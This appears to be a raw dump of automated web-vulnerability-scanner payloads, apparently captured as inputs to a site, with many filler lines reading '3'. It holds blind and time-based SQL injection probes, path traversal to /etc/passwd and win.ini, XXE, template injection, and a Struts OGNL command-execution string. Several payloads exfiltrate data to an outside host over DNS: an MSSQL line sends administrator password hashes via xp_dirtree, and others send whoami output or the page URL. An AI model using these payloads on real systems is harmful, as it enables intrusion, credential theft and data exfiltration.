-1/**/OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
-1″OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255–
-1/**/OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
1’/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
-1’OR 1=1)) AND ASC(MID((Now()),1,1))>0
gethostbyname(trim(‘izimdayqtlrxr-udux9gfdw-tmxn6psyp4yvqn01′.’cqq.r87.me’));
-1″OR 1=1) AND ASC(MID((Now()),1,1))=1
-1’OR 1=1 AND ASC(MID((Now()),1,1))<255
1 AND ASC(MID((Now()),1,1))>255
1″ AND ASC(MID((Now()),1,1))>0
1″ OR 1=1 OR “ns”=”ns
-1’OR/**/1=1))/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>0–
-1’OR/**/1=1))/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>25
-1/**/OR/**/1=1))/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)<255–
-1’OR/**/1=1)/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)=1–
-1″OR/**/1=1)/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>0–
-1/**/OR/**/1=1)/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>0
-1’OR/**/1=1/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>255
-1/**/OR/**/1=1/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)<255–
1/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)=1–
1’/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>25
-1’OR 1=1)) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1–
-1″OR 1=1)) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)<255
-1’OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)<255
-1 OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)<255
-1 OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0–
1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1
1″ AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)=1–
-1’OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)<255
-1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)<255–
-1’OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)<255
-1 OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
-1″OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0
-1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1
1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)=1
1″ AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25–
-1’OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>255
-1″OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
-1’OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
-1/**/OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1–
-1″OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)<255–
-1/**/OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25
1’/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)=1
-1’OR 1=1)) AND ASC(MID((Now()),1,1))=1
-1’OR 1=1)) AND ASC(MID((Now()),1,1))>25
-1″OR 1=1)) AND ASC(MID((Now()),1,1))>25
-1’OR 1=1) AND ASC(MID((Now()),1,1))>255
-1 OR 1=1) AND ASC(MID((Now()),1,1))>0
-1″OR 1=1 AND ASC(MID((Now()),1,1))=1
1 AND ASC(MID((Now()),1,1))=1
1″ AND ASC(MID((Now()),1,1))<255
3
3
3
3
expr 268409241 – 2;
3
3
WAITFOR DELAY ‘0:0:25’–
3
3
3
WAITFOR DELAY ‘0:0:25’–
3
3
3
eval(‘print localtime()*0+0xFFF9999-22’)
1));SELECT pg_sleep(25)–
3
3
3
3
3
3
3
3
3
3
1 OR 17-7=10
-1″OR/**/1=1)/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>255–
1/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)<255
-1’OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>0–
-1 OR 1=1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)<255–
-1″OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)<255–
-1’OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25–
-1’OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0–
-1/**/OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25–
1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>25–
-1 OR 1=1)) AND ASC(MID((Now()),1,1))=1
-1″OR 1=1 AND ASC(MID((Now()),1,1))>25
1″ AND ASC(MID((Now()),2,1))=26
-1/**/OR/**/1=1))/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)=1
‘{${gethostbyname(trim(‘9iyahc8aoxejcankrhnwxxozbc5json0h8b6xadp’.’gko.r87.me’))}}’
-1’OR 1=1)) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
-1 OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)<255–
1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
-1 OR 1=1)) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25–
-1″OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)<255
1″ AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255
-1’OR/**/1=1)/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),2,1)),0)=26
-1/**/OR/**/1=1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)<255
-1 OR 1=1)) AND ASC(MID((Now()),1,1))<255
-1″OR 1=1 AND ASC(MID((Now()),1,1))>0
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
#set($c=268409241 – 5)
${c}
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
….//….//….//….//….//….//….//….//….//….//….//etc/passwd
3
<!DOCTYPE r [ %dtd;]>&a;
::1/elmah.axd
-1’OR/**/1=1))/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>25–
-1″OR/**/1=1)/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)=1–
-1/**/OR/**/1=1/**/AND/**/ISNULL(ASCII(SUBSTRING(CAST((SELECT/**/@@version)AS/**/varchar(8000)),1,1)),0)>255–
-1’OR 1=1)) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25
-1 OR 1=1) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>255
1 AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,1)),0)>25
3
-1’OR 1=1) AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25–
-1’OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>0–
-1 OR 1=1 AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>25
1″ AND IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1)),0)>255–
-1″OR/**/1=1))/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)<255
declare @h varchar(999)select @h=’1’+substring(name+’-‘+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+’.iyw6-m1dpqkkx5fj6bvhtiazsdxb88i_jen8rl_m’+’7im.r87.me’ from sys.sql_logins WHERE principal_id=1;exec(‘xp_dirtree ”\\’+@h+’\c$”’)
1′))exec(‘xp_dirtree ”\\iyw6-m1dpqiwzzmhbdbkhrgrjlks7tojunxof8zj’+’ewi.r87.me’+’\c$\a”’)–
1/**/AND/**/COALESCE(ASCII(SUBSTR(CAST((VERSION())AS/**/VARCHAR(8000)),1,1)),0)>0
(select UTL_INADDR.GET_HOST_ADDRESS(chr(105)||chr(121)||chr(119)||chr(54)||chr(45)||chr(109)||chr(49)||chr(100)||chr(112)||chr(113)||chr(100)||chr(107)||chr(112)||chr(104)||chr(122)||chr(114)||chr(55)||chr(50)||chr(104)||chr(106)||chr(97)||chr(110)||chr(95)||chr(122)||chr(117)||chr(97)||chr(97)||chr(50)||chr(116)||chr(106)||chr(98)||chr(111)||chr(119)||chr(54)||chr(115)||chr(102)||chr(52)||chr(104)||chr(49)||chr(117)||chr(100)||chr(115)||chr(101)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)
-1’OR 1=1) AND ASC(MID((Now()),1,1))=1
-1’OR 1=1 AND ASC(MID((Now()),1,1))=1
-1 OR 1=1 AND ASC(MID((Now()),1,1))>25
1′ AND ASC(MID((Now()),1,1))>0
1 OR X=’ss
gethostbyname(trim(‘iyw6-m1dpqnpi7hmds-tyiaxf9jxjrljbcuenxj1′.’_ys.r87.me’))
‘{${gethostbyname(trim(‘iyw6-m1dpq80he5r4sgmexjxijrgcjbbzy80ykwz’.’5lm.r87.me’))}}’
“+createobject(“WScript.Shell”).exec(“nslookup iyw6-m1dpqi6mjyaudvtu4rovapl762o9jigy35d” & “soa.r87.me”).StdOut.ReadAll+”
& nslookup iyw6-m1dpqaccl02wz2sqqjcwbvahbbmutkztdha^fgc.r87.me&’\”`0&nslookup iyw6-m1dpqaccl02wz2sqqjcwbvahbbmutkztdha^fgc.r87.me&`’
& nslookup iyw6-m1dpqmgmqt_9b5a_0bsox1ach9_hrtepqhl^k7i.r87.me&’\”`0&nslookup iyw6-m1dpqmgmqt_9b5a_0bsox1ach9_hrtepqhl^k7i.r87.me&`’
‘& nslookup iyw6-m1dpqjoxwwany1jaeom_iw3omhskprwf6iw^93e.r87.me&’\”`0&nslookup iyw6-m1dpqjoxwwany1jaeom_iw3omhskprwf6iw^93e.r87.me&`’
‘& nslookup iyw6-m1dpqqxkn60-fydxurlngrvlbnoitpsynfn^82a.r87.me&’\”`0&nslookup iyw6-m1dpqqxkn60-fydxurlngrvlbnoitpsynfn^82a.r87.me&`’
“& nslookup iyw6-m1dpquvg9gh1v6tlcruniyg1k9pt-4mxvp4^cse.r87.me&’\”`0&nslookup iyw6-m1dpquvg9gh1v6tlcruniyg1k9pt-4mxvp4^cse.r87.me&`’
“& nslookup iyw6-m1dpq7ocy3-6qpbcllzhkess_wokwlw6hd9^lny.r87.me&’\”`0&nslookup iyw6-m1dpq7ocy3-6qpbcllzhkess_wokwlw6hd9^lny.r87.me&`’
nslookup “iyw6-m1dpqyzywqsx7z1oqt5swfk7ariwkncfj4c””i9k.r87.me”
nslookup “iyw6-m1dpqzf7bovsarkvbddun0ij2ylaafat97i””al0.r87.me”
&nslookup “iyw6-m1dpqfnqgl2why3dulgz3cgkel3w_f7e22u””y1y.r87.me”
&nslookup “iyw6-m1dpqrzvkraxijiibk17wfzc1kmus_vqxy3″”jt4.r87.me”
‘&nslookup “iyw6-m1dpqibknoo-3z9ntrsewdmgpov_rjevqfm””_na.r87.me”
‘&nslookup “iyw6-m1dpqd_tjzk_th1qacz65-q5aqhqmpx940y””ftm.r87.me”
“&nslookup “iyw6-m1dpqv5a03ruhs9hsneybawxegoxmi2g01d””og4.r87.me”
“&nslookup “iyw6-m1dpqcsqydaas8gqprtkifnnym2b9wg-luv””pxc.r87.me”
|nslookup${IFS}”iyw6-m1dpqfy8rvd_scs2bphaith01jox0z_rjgi””jdk.r87.me”
|nslookup${IFS}”iyw6-m1dpq8waagjmd057ztiia0qq9dvhushzsxj””3le.r87.me”
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’nslookup `whoami`.”iyw6-m1dpqjwjgdnliz0mo38usc4k8ynprbdd815″”mmy.r87.me”‘).(#p=new java.lang.ProcessBuilder({‘/bin/bash’,’-c’,#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
3
3
3
3
‘& SET /A 0xFFF9999-2 &
‘AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or ‘1’=’
3
3
3
3
NSFTW
3
3
3
3
/../../../../../../../../../../windows/win.ini
3
3
3
3
3
3
3
3
3
{php}print(int)0xFFF9999-22;{/php}
3
3
3
3
http://ocbpirflret9odnyqlh9l2ich4bl639huxskq6_egkf.r87.me/p/
3
3
exec(‘xp_dirtree ”\\ocbpirflrexamtfxoy0laymxctedldovu519sblt’+’6e8.r87.me’+’\c$\a”’)
syscolumns WHERE 2>3;exec(‘xp_dirtree ”\\ocbpirflregcs5lzeua6fq2l0zjxobhoskhji5vn’+’th4.r87.me’+’\c$\a”’)–
cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(111)||chr(99)||chr(98)||chr(112)||chr(105)||chr(114)||chr(102)||chr(108)||chr(114)||chr(101)||chr(51)||chr(98)||chr(57)||chr(122)||chr(117)||chr(116)||chr(45)||chr(95)||chr(121)||chr(105)||chr(112)||chr(106)||chr(52)||chr(99)||chr(118)||chr(98)||chr(109)||chr(51)||chr(116)||chr(101)||chr(108)||chr(114)||chr(102)||chr(119)||chr(112)||chr(97)||chr(106)||chr(105)||chr(98)||chr(103)||chr(117)||chr(113)||chr(48)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)
“;l=document.createElement(“link”);l.rel=”prefetch”;l.href=”//ocbpirflrecfgkzcysmqs5ne1xqkv77otbstngvt”+”qwi.r87.me/r/?”+location.href;document.head.appendChild(l);//
“;l=document.createElement(“link”);l.rel=”prefetch”;l.href=”//ocbpirflret4asxi5ym9h4nm9czrbgcit5w-uxk2″+”h2w.r87.me/r/?”+location.href;document.head.appendChild(l);//
gethostbyname(trim(‘ocbpirflrelzpvpq-cjkc1x_qivj5__fx9bkx3b9′.’wcs.r87.me’))
‘{${gethostbyname(trim(‘ocbpirflrek2mplrtvumiklcjiphdi4cgqeooxly’.’whe.r87.me’))}}’
eval(‘gethostbyname(lc ‘ocbpirflream9kw6rqyvm4mt-7u1ir3ud91h9w47′.’rcw.r87.me’)’)